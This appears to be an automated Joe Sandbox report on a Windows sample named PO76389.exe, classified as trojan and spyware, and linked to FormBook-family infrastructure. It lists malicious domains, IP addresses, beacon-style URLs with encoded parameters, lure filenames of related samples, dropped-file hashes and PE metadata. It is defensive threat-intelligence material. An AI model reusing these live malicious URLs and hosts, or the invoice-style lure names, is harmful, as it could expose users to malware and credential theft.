            NameIPActiveMaliciousAntivirus DetectionReputation
            fimgroup.net
            62.149.128.40
            truetrue
              unknown
              www.independent200.org
              103.42.108.46
              truetrue
                unknown
                chamadaslotgiris.net
                3.33.130.190
                truetrue
                  unknown
                  dns.ladipage.com
                  13.228.81.39
                  truetrue
                    unknown
                    www.personal-loans-jp8.xyz
                    199.59.243.226
                    truetrue
                      unknown
                      www.quantumnests.xyz
                      162.0.239.141
                      truetrue
                        unknown
                        www.shipincheshi.skin
                        154.23.176.197
                        truetrue
                          unknown
                          tigre777gg.online
                          3.33.130.190
                          truetrue
                            unknown
                            www.mediaplug.biz
                            66.81.203.200
                            truetrue
                              unknown
                              parcelfly.net
                              84.32.84.32
                              truetrue
                                unknown
                                www.parcelfly.net
                                unknown
                                unknowntrue
                                  unknown
                                  www.monos.shop
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.masteriocp.online
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.chamadaslotgiris.net
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.fimgroup.net
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.siyue.xyz
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.linkbasic.net
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.abbabyfernando.online
                                              unknown
                                              unknowntrue
                                                unknown
                                                www.tigre777gg.online
                                                unknown
                                                unknowntrue
                                                  unknown
                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.independent200.org/yl6y/true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.mediaplug.biz/osde/true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.personal-loans-jp8.xyz/wwak/?prutfR_P=E3TGpDthwwVtcd6zArHMi0+elvxdJNsp076mRxbq1wlJhRxdRCVM2u01G8le2+tM+4jqrTcu85UNoN7iByxUa15ZbVJvSSR5vxb+VJw93FLmyr7mIfPMGWfmtP/A6wTj3w==&u8b=M0MH_xux6true
                                                  • Avira URL Cloud: safe
                                                  unknown
http://www.parcelfly.net/n59g/ | true | Avira URL Cloud: safe | unknown
http://www.quantumnests.xyz/vnd3/ | true | Avira URL Cloud: safe | unknown
http://www.personal-loans-jp8.xyz/wwak/ | true | Avira URL Cloud: safe | unknown
http://www.independent200.org/yl6y/?u8b=M0MH_xux6&prutfR_P=QPKrZbNCTa4h9OiWdSr2LPtYKpnFP+xQgXRm4OHk1vP2UInoYMEgLbhzG96tdyW5WcZsMbYjLnFg+NDONb5+FSdSIKD6JgMVQEI+NVmTQ69s3vAAdvPATGhITAPXZUXQ6A== | true | Avira URL Cloud: safe | unknown
http://www.shipincheshi.skin/0vb3/?prutfR_P=xUzASW4UVirhqEepkKH7G1hhCXRgKJ+LG3aq8idvTSxDBC+AgnYLMr8gyh0BIXno1CEegJvcgs9HgFk4HlC4XGXQkMAamkZroN1kMIfewJ5xcpTkuE3fYdnwX+QQCm9qWw==&u8b=M0MH_xux6 | true | Avira URL Cloud: safe | unknown
http://www.tigre777gg.online/06rp/ | true | Avira URL Cloud: safe | unknown
http://www.mediaplug.biz/osde/?prutfR_P=RWxN1EBNqsrI97gRZZLgxxJS1816+Tom3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sPWqJU3bviStab5pw4zunthcPnIDJoH7elLKb+pwDrPWt7Q==&u8b=M0MH_xux6 | true | Avira URL Cloud: safe | unknown
http://www.shipincheshi.skin/0vb3/ | true | Avira URL Cloud: safe | unknown
http://www.masteriocp.online/p5rq/ | true | Avira URL Cloud: safe | unknown
http://www.fimgroup.net/f3w9/ | true | Avira URL Cloud: safe | unknown
http://www.parcelfly.net/n59g/?prutfR_P=5pnE2UHiCW8ObGXSgpx/iGO8gW0d7AEBtxaudhAi15+uyfG3JVq1h0FDH1nQvWuKz1Kon5CV4Z0icGbf56g2ha7dmOKO9m7V5QX/Ut0iNssFIOAJa+JBBsuFpAHajyYobg==&u8b=M0MH_xux6 | true | Avira URL Cloud: safe | unknown
http://www.quantumnests.xyz/vnd3/?prutfR_P=xYBn5zztkuVfiCwoRQOy2opDl7RgoPyR03XK+4rS3g0RcyLb68RvZiy9qVH4+ViXNRgW3ur8wHahmEpIZ6ERRmF7/bt0PBBiFKuaDRgyJqJJ+MxR9VKTQpRM54mqQi17vQ==&u8b=M0MH_xux6 | true | Avira URL Cloud: safe | unknown
http://www.chamadaslotgiris.net/gqyt/?prutfR_P=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQykA5Xt3rjq5i1um85DwW90kuO6Jainieo24Gz0Ls55ZIPYw==&u8b=M0MH_xux6 | true | Avira URL Cloud: safe | unknown
http://www.masteriocp.online/p5rq/?prutfR_P=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5BxIUOARFC/F7kb9hzkdtOwUlduKX5dZAlA2NzH1X/KLd6Q==&u8b=M0MH_xux6 | true | Avira URL Cloud: safe | unknown
http://www.fimgroup.net/f3w9/?prutfR_P=Dh4Gi9+74bFgt7GfY7nAkA9WO4K4BtRildy9F7aGfftu7RHBnk3NlrVThFQn4aec5hsiNdt2NoWcO3TRD6+a1p9HDTSMRDAgwWxIW4AdBTiWqaWdzxLVl6hXjmw9P5qUhA==&u8b=M0MH_xux6 | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | netbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | netbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.masteriocp.online/p5rq/?prutfR_P=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR | netbtugc.exe, 00000005.00000002.4571457721.0000000003C98000.00000004.10000000.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000007.00000002.4569695157.00000000037D8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | netbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | netbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.ecosia.org/newtab/ | netbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fimgroup.net:80/f3w9/?prutfR_P=Dh4Gi9 | netbtugc.exe, 00000005.00000002.4571457721.0000000004DDE000.00000004.10000000.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000007.00000002.4569695157.000000000491E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | netbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com | netbtugc.exe, 00000005.00000002.4571457721.0000000004472000.00000004.10000000.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000007.00000002.4569695157.0000000003FB2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.thinkphp.cn | netbtugc.exe, 00000005.00000002.4571457721.0000000004C4C000.00000004.10000000.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000007.00000002.4569695157.000000000478C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | netbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fimgroup.net | TrBUxuahdhJ.exe, 00000007.00000002.4571538439.0000000005562000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | netbtugc.exe, 00000005.00000002.4574380406.0000000007698000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
62.149.128.40 | fimgroup.net | Italy | 31034 | ARUBA-ASNIT | true
162.0.239.141 | www.quantumnests.xyz | Canada | 22612 | NAMECHEAP-NETUS | true
199.59.243.226 | www.personal-loans-jp8.xyz | United States | 395082 | BODIS-NJUS | true
84.32.84.32 | parcelfly.net | Lithuania | 33922 | NTT-LT-ASLT | true
13.228.81.39 | dns.ladipage.com | United States | 16509 | AMAZON-02US | true
66.81.203.200 | www.mediaplug.biz | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | true
103.42.108.46 | www.independent200.org | Australia | 45638 | SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU | true
3.33.130.190 | chamadaslotgiris.net | United States | 8987 | AMAZONEXPANSIONGB | true
154.23.176.197 | www.shipincheshi.skin | United States | 174 | COGENT-174US | true
                                                  Joe Sandbox version:40.0.0 Tourmaline
                                                  Analysis ID:1511731
                                                  Start date and time:2024-09-16 09:36:07 +02:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 10m 39s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:7
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:2
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:PO76389.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@7/3@14/9
                                                  EGA Information:
                                                  • Successful, ratio: 75%
                                                  HCA Information:
                                                  • Successful, ratio: 96%
                                                  • Number of executed functions: 53
                                                  • Number of non-executed functions: 300
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                  • Execution Graph export aborted for target TrBUxuahdhJ.exe, PID 2556 because it is empty
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:38:23 | API Interceptor | 9450343x Sleep call for process: netbtugc.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
62.149.128.40 | bintoday1.exe | malicious | FormBook | www.fimgroup.net/m3ft/
62.149.128.40 | Atlas Copco- WEPCO.exe | malicious | FormBook | www.fimgroup.net/fqzh/
62.149.128.40 | file No83293 PO & Specification.gz.exe | malicious | FormBook | www.pyrlist-test.cloud/apau/?32gdi4=omLpuGVmsyOHdGpRdjgRwIdS8onMLPtYZwnQxrZ2pdkklfz3vB2UBDvQaSU1YR7Xr6uYdwMb/adcCe42hD+vmDiudnADMik3xc+FpjXk83bBo7qDRClwT378wlWS9dAj4UFWXQx8lPSh&wLAt=m8MLyLih-H4lf
62.149.128.40 | 64MXEd79F1.exe | malicious | FormBook | www.autoreediritto.com/aucq/?pZXDmpb8=KoQMLvtx3M4SfAq6wckzW9CSarLFnHHB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqXenXGQFHAUL+cMNE98AcgW9WHO0Ixf81xDLisHhibZAVvCGoKVw=&fv=tdYXXJI8Drl4
62.149.128.40 | 09090.exe | malicious | FormBook | www.autoreediritto.com/aucq/?zFQHE=KoQMLvtx3M4SfAq6wckzW9CSarLFnHHB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqXenXGQFHAUL+cMNE98AcgW9WHO0Ixf81xDLisHhibZAVvCGoKVw=&yF3=b0i4Y00xHtf
62.149.128.40 | 8bwKawHg0Z.exe | malicious | FormBook | www.autoreediritto.com/aucq/?m4kp=Q04lO4tHCdMhGRPp&Z2n4kTEh=KoQMLvtx3M4SfAq6wckzW9CSarLFnHHB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqUenkRjtIRRn+PcJ+980YglFIHv1RxaMTu2bilHhQR8NY0g==
62.149.128.40 | 98790ytt.exe | malicious | FormBook | www.autoreediritto.com/aucq/?GHo=KoQMLvtx3M4SfAq6wckzW9CSarLFnHHB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqXenXGQFHAUL+cMNE98AcgW9WHO0Ixf81xDLisHhibZAVvCGoKVw=&i2=tZJdhrYHabWX4H
62.149.128.40 | aertrh.exe | malicious | FormBook | www.autoreediritto.com/aucq/?bbtD=v8Pp0x&mXnt=KoQMLvtx3M4SfAq91ckdEaeNevOygAbB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqWc3KGV5GAX2rZsRT+8QcgDF4B+0ExfJRqG4=
62.149.128.40 | RB_VAC_1.EXE.exe | malicious | DBatLoader, FormBook | www.stnlab.net/twn7/
62.149.128.40 | Company profile.pif.exe | malicious | FormBook, PureLog Stealer | www.insertcoen.com/wu8v/
162.0.239.141 | SHIPPING DOC MBL+HBL.exe | malicious | FormBook | www.quantumnests.xyz/vnd3/
162.0.239.141 | Purchase order.exe | malicious | FormBook | www.goulfy.life/ch9d/
162.0.239.141 | Remittance advice.exe | malicious | FormBook | www.goulfy.life/ch9d/
162.0.239.141 | PROFORMA INVOICE BKS-0121-24-25-JP240604.exe | malicious | FormBook | www.fineg.online/mkan/
162.0.239.141 | p4LNUqyKZM.exe | malicious | FormBook | www.fineg.online/mkan/
162.0.239.141 | PO_987654345678.exe | malicious | FormBook | www.fineg.online/mkan/?Qd=++BThBYRK05wjkBMoiNZpGp8KzaJeIQtL/1q1tE7a+KA1WWTK8ndyCrnLs1rj5YPQ184ZKAvPKam8uu94QVQnk5qhKksqEgqCLgXJ6uhhZrz9ToUPGPp3h4=&0z=mDcdcR8
162.0.239.141 | INV20240828.exe | malicious | FormBook | www.fineg.online/mkan/
162.0.239.141 | Quotation-27-08-24.exe | malicious | FormBook | www.stolex.top/kunq/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
dns.ladipage.com | SHIPPING DOC MBL+HBL.exe | malicious | FormBook | 18.139.62.226
dns.ladipage.com | r3T-ENQ-O-2024-10856.exe | malicious | FormBook | 13.228.81.39
dns.ladipage.com | SecuriteInfo.com.Win32.Malware-gen.24953.22588.exe | malicious | FormBook | 13.228.81.39
dns.ladipage.com | 3T-ENQ-O-2024-10856.exe | malicious | FormBook | 18.139.62.226
dns.ladipage.com | New Purchase Order.exe | malicious | FormBook | 54.179.173.60
dns.ladipage.com | Scan 00093847.exe | malicious | FormBook | 18.139.62.226
dns.ladipage.com | z11SOAAUG2408.exe | malicious | FormBook | 13.228.81.39
dns.ladipage.com | REQUEST FOR QUOTATION.exe | malicious | FormBook, GuLoader | 13.228.81.39
dns.ladipage.com | DN.exe | malicious | FormBook | 18.139.62.226
dns.ladipage.com | https://www.newbalancestore.asia/nb530.nh?utm_source=sale | malicious | Unknown | 13.228.81.39
www.personal-loans-jp8.xyz | SHIPPING DOC MBL+HBL.exe | malicious | FormBook | 199.59.243.226
www.personal-loans-jp8.xyz | r9856_7.exe | malicious | FormBook | 199.59.243.226
www.personal-loans-jp8.xyz | Quotation-27-08-24.exe | malicious | FormBook | 199.59.243.226
www.shipincheshi.skin | PASU5160894680 DOCS.scr.exe | malicious | FormBook | 154.23.176.197
www.shipincheshi.skin | Jsn496Em5T.exe | malicious | FormBook | 154.23.176.197
www.shipincheshi.skin | play.exe | malicious | FormBook | 154.23.176.197
www.quantumnests.xyz | SHIPPING DOC MBL+HBL.exe | malicious | FormBook | 162.0.239.141
www.independent200.org | SHIPPING DOC MBL+HBL.exe | malicious | FormBook | 103.42.108.46
www.independent200.org | r3T-ENQ-O-2024-10856.exe | malicious | FormBook | 103.42.108.46
www.independent200.org | 3T-ENQ-O-2024-10856.exe | malicious | FormBook | 103.42.108.46
www.independent200.org | LKkVS1VFJD.exe | malicious | FormBook | 103.42.108.46
Match | Associated Sample Name / URL | Detection | Threat Name | Context
NTT-LT-ASLT | k8FSEGGo4d9blGr.exe | malicious | FormBook | 84.32.84.32
NTT-LT-ASLT | SHIPPING DOC MBL+HBL.exe | malicious | FormBook | 84.32.84.32
NTT-LT-ASLT | SecuriteInfo.com.Win32.Malware-gen.24953.22588.exe | malicious | FormBook | 84.32.84.32
NTT-LT-ASLT | PASU5160894680 DOCS.scr.exe | malicious | FormBook | 84.32.84.37
NTT-LT-ASLT | RFQ-TECMARKQATAR PO33109.xlsx | malicious | FormBook | 84.32.84.32
NTT-LT-ASLT | Purchase order.exe | malicious | FormBook | 84.32.84.32
NTT-LT-ASLT | r9856_7.exe | malicious | FormBook | 84.32.84.32
NTT-LT-ASLT | Order#Qxz091124.exe | malicious | FormBook | 84.32.84.32
NTT-LT-ASLT | https://cartoon-kingdom.fr | malicious | Unknown | 84.32.84.18
NTT-LT-ASLT | INV & BANK DETAILS LETTER.pdf.exe | malicious | FormBook | 84.32.84.32
NAMECHEAP-NETUS | Kommerzielle Bestellung.pdf (2).exe | malicious | FormBook | 198.54.117.242
NAMECHEAP-NETUS | PROFOMA INVOICE SHEET.exe | malicious | FormBook | 199.192.21.169
NAMECHEAP-NETUS | Petronas request for-quotation.exe | malicious | FormBook | 162.0.236.169
NAMECHEAP-NETUS | file.exe | malicious | Clipboard Hijacker, Raccoon Stealer v2 | 198.54.120.231
NAMECHEAP-NETUS | file.exe | malicious | Clipboard Hijacker, Raccoon Stealer v2 | 198.54.120.231
NAMECHEAP-NETUS | k8FSEGGo4d9blGr.exe | malicious | FormBook | 63.250.47.40
NAMECHEAP-NETUS | https://urlz.fr/s6ZW | malicious | Unknown | 63.250.43.136
NAMECHEAP-NETUS | SHIPPING DOC MBL+HBL.exe | malicious | FormBook | 162.0.239.141
NAMECHEAP-NETUS | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&url=amp%2F%E2%80%8Bfin%C2%ADcaa%C2%ADin%C2%ADa%C2%AD%C2%AD.%E2%80%8Bco%C2%ADm%2Fauth%2Factive%2FUa51gHNn5MTLdsCceMMGWdci/ZmVydGlsaXplckBjZGZhLmNhLmdvdg== | malicious | EvilProxy, HTMLPhisher | 162.0.228.73
NAMECHEAP-NETUS | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&url=amp%2F%E2%80%8Bfin%C2%ADcaa%C2%ADin%C2%ADa%C2%AD%C2%AD.%E2%80%8Bco%C2%ADm%2Fauth%2Factive%2FUa51gHNn5MTLdsCceMMGWdci/ZmVydGlsaXplckBjZGZhLmNhLmdvdg== | malicious | EvilProxy, HTMLPhisher | 162.0.228.73
BODIS-NJUS | Petronas request for-quotation.exe | malicious | FormBook | 199.59.243.226
BODIS-NJUS | k8FSEGGo4d9blGr.exe | malicious | FormBook | 199.59.243.226
BODIS-NJUS | SHIPPING DOC MBL+HBL.exe | malicious | FormBook | 199.59.243.226
BODIS-NJUS | invoice.exe | malicious | FormBook | 199.59.243.226
BODIS-NJUS | SecuriteInfo.com.Win32.Malware-gen.24953.22588.exe | malicious | FormBook | 199.59.243.226
BODIS-NJUS | file.exe | malicious | FormBook | 199.59.243.226
BODIS-NJUS | Purchase order.exe | malicious | FormBook | 199.59.243.226
BODIS-NJUS | r9856_7.exe | malicious | FormBook | 199.59.243.226
BODIS-NJUS | x.exe | malicious | FormBook | 199.59.243.226
BODIS-NJUS | bin.exe | malicious | FormBook | 199.59.243.226
ARUBA-ASNIT | SecuriteInfo.com.Win32.Sector.30.19697.26848.exe | malicious | Sality | 77.81.228.77
ARUBA-ASNIT | BootstrapperV1.19.exe | malicious | DCRat, PureLog Stealer, zgRAT | 80.211.144.156
ARUBA-ASNIT | http://fotoclubsanmartino.it | malicious | Unknown | 62.149.128.45
ARUBA-ASNIT | file.exe | malicious | LummaC, Stealc, Vidar | 80.88.87.221
ARUBA-ASNIT | file.exe | malicious | LummaC, Stealc, Vidar | 80.88.87.221
ARUBA-ASNIT | file.exe | malicious | LummaC, Stealc, Vidar | 80.88.87.221
ARUBA-ASNIT | file.exe | malicious | LummaC, Stealc, Vidar | 80.88.87.221
ARUBA-ASNIT | file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, Stealc | 80.88.87.245
ARUBA-ASNIT | eRZQCpMb4y.exe | malicious | DCRat, PureLog Stealer, zgRAT | 80.211.144.156
ARUBA-ASNIT | 4BJoBHQ6T3.exe | malicious | DCRat, PureLog Stealer, zgRAT | 80.211.144.156
                                                  No context
                                                  No context
                                                  Process:C:\Windows\SysWOW64\netbtugc.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                  Category:dropped
                                                  Size (bytes):196608
                                                  Entropy (8bit):1.121297215059106
                                                  Encrypted:false
                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\PO76389.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):287744
                                                  Entropy (8bit):7.9942541079878255
                                                  Encrypted:true
                                                  SSDEEP:6144:CqJoNJR1VXFloNANpHUvsGMZP+BdM2G7hWvU3QjOqHYc:CPPRXr4ANtUFMZqdkgKq4c
                                                  MD5:BBF11FC4431529CCCE3A6AAD01D5E062
                                                  SHA1:11B40CF650FCE7CBBB935218C22843CB1612CB79
                                                  SHA-256:33AC9A6B68D818768FE3221A4C12646D72D6D50D5D7DEB65E416666415C28877
                                                  SHA-512:499682C36C572C224D7ADF9FA5ED356DEE3771532EDCFECD1A015B56B17B1FF6CCE326A3074DFC42BE31561AD7595C2A287FE450F64E13DC951FB1CC41E7C324
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:..p..4PIL..[....t.5P...z:<...MVURJ4M0HA5SJQ5R94PILMVURJ4M0H.5SJ_*.74.@.l.T....X!2.#8>R XYp*-#8:&jV(.:4[s#?..vgp$#)3{_G>i0HA5SJQLS0.m)+.k55..-W.[...kU5....q62.P...t!R..8V:.T7.LMVURJ4M`.A5.KP5....ILMVURJ4.0J@>RAQ5.=4PILMVURJTY0HA%SJQEV94P.LMFURJ6M0NA5SJQ5R?4PILMVUR:0M0JA5SJQ5P9t.IL]VUBJ4M0XA5CJQ5R94@ILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVU|>Q5DHA5..U5R)4PI.IVUBJ4M0HA5SJQ5R94pIL-VURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVUR
                                                  Process:C:\Users\user\Desktop\PO76389.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):287744
                                                  Entropy (8bit):7.9942541079878255
                                                  Encrypted:true
                                                  SSDEEP:6144:CqJoNJR1VXFloNANpHUvsGMZP+BdM2G7hWvU3QjOqHYc:CPPRXr4ANtUFMZqdkgKq4c
                                                  MD5:BBF11FC4431529CCCE3A6AAD01D5E062
                                                  SHA1:11B40CF650FCE7CBBB935218C22843CB1612CB79
                                                  SHA-256:33AC9A6B68D818768FE3221A4C12646D72D6D50D5D7DEB65E416666415C28877
                                                  SHA-512:499682C36C572C224D7ADF9FA5ED356DEE3771532EDCFECD1A015B56B17B1FF6CCE326A3074DFC42BE31561AD7595C2A287FE450F64E13DC951FB1CC41E7C324
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:..p..4PIL..[....t.5P...z:<...MVURJ4M0HA5SJQ5R94PILMVURJ4M0H.5SJ_*.74.@.l.T....X!2.#8>R XYp*-#8:&jV(.:4[s#?..vgp$#)3{_G>i0HA5SJQLS0.m)+.k55..-W.[...kU5....q62.P...t!R..8V:.T7.LMVURJ4M`.A5.KP5....ILMVURJ4.0J@>RAQ5.=4PILMVURJTY0HA%SJQEV94P.LMFURJ6M0NA5SJQ5R?4PILMVUR:0M0JA5SJQ5P9t.IL]VUBJ4M0XA5CJQ5R94@ILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVU|>Q5DHA5..U5R)4PI.IVUBJ4M0HA5SJQ5R94pIL-VURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVURJ4M0HA5SJQ5R94PILMVUR
                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                  Entropy (8bit):7.954050898703191
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.39%
                                                  • UPX compressed Win32 Executable (30571/9) 0.30%
                                                  • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  File name:PO76389.exe
                                                  File size:756'224 bytes
                                                  MD5:f28830224d4ed5b9b9b16fb45d5fd569
                                                  SHA1:1cefa43bae388468b9a931ec31f49248711de624
                                                  SHA256:5cf70c937525b712b048b9196182e3a1a988d2f112d8b7647773bcd0db23101d
                                                  SHA512:412c486dc8822b1b4b86cd6a472fdce1e65f5804059dee6e81b93866aa3c4a12f0e8c7745d8148a8d0adb1bc9c030700e4d83890ec46d27af752606a1e3acb0a
                                                  SSDEEP:12288:SXe9PPlowWX0t6mOQwg1Qd15CcYk0We1FVWKpUW6WEZ0N936NFwBI4AGI2hWKRu:nhloDX0XOf4VWvcm44
                                                  TLSH:82F4234544C5CCE5D26AA339C0F3CE84286DB5328CD57BEC9228F66DAC65343D942BAB
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S................g..........$...............%.....H.......X.2...........q)..Z...q)......q)........\.....q)......Rich...........
                                                  Icon Hash:aaf3e3e3938382a0
                                                  Entrypoint:0x53b090
